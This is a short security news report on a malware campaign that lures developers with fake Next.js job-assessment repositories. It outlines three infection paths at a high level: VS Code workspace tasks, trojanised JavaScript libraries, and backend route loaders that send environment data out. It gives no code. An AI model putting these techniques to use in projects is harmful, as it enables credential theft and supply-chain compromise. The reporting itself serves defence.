A sophisticated campaign is targeting developers by using malicious repositories disguised as authentic Next.js projects and technical job assessments to gain persistent access to systems. These attacks utilize various entry points on trusted platforms to trick users into executing JavaScript that facilitates remote command and control directly in memory.
Threat actors are increasingly using job-themed lures to blend into the standard daily workflows of developers, making it difficult to distinguish malicious activity from routine tasks. This campaign relies on fake repositories hosted on trusted platforms like Bitbucket, often using professional-sounding names to attract individuals looking for employment opportunities. By framing the code as a required technical assessment, attackers significantly increase the likelihood that a developer will download and run the project without suspicion.
Analysis of the campaign reveals three primary methods of execution that all aim to run attacker-controlled code in memory. The first involves Visual Studio Code workspace automation, where malicious code is triggered the moment a developer opens and trusts a project folder. This is achieved through specific workspace configurations that automatically run tasks upon opening, reaching out to external domains to pull down the initial payload.
A second path exploits the standard development cycle by embedding malicious logic within modified JavaScript libraries, such as those masquerading as common tools like jQuery. When a developer runs the standard command to start a local development server, the hidden code activates and fetches a loader. This loader then executes a payload within the Node.js environment, allowing the attacker to bypass traditional security checks that monitor for suspicious file creation on the disk.
The third method targets the application backend, where launching the server causes hidden logic within module or route files to execute. This loader exfiltrates the process environment to an external server and receives JavaScript in return to be executed within the server process. Regardless of which path is taken, the final payload profiles the host machine and establishes a unique identifier to track the compromised system and coordinate further actions.
Once the initial foothold is established, the malware transitions into a second-stage controller that provides the attackers with a persistent pathway for receiving and executing new tasks. By operating primarily in memory and avoiding the creation of traceable files on the hard drive, the campaign minimizes its footprint. This allows the threat actors to maintain long-term access to compromised developer machines, potentially leading to the theft of sensitive credentials or the injection of malicious code into legitimate software supply chains.
Source: Microsoft Flags Fake Next.js Job Repositories Pushing In-Memory Malware Attacks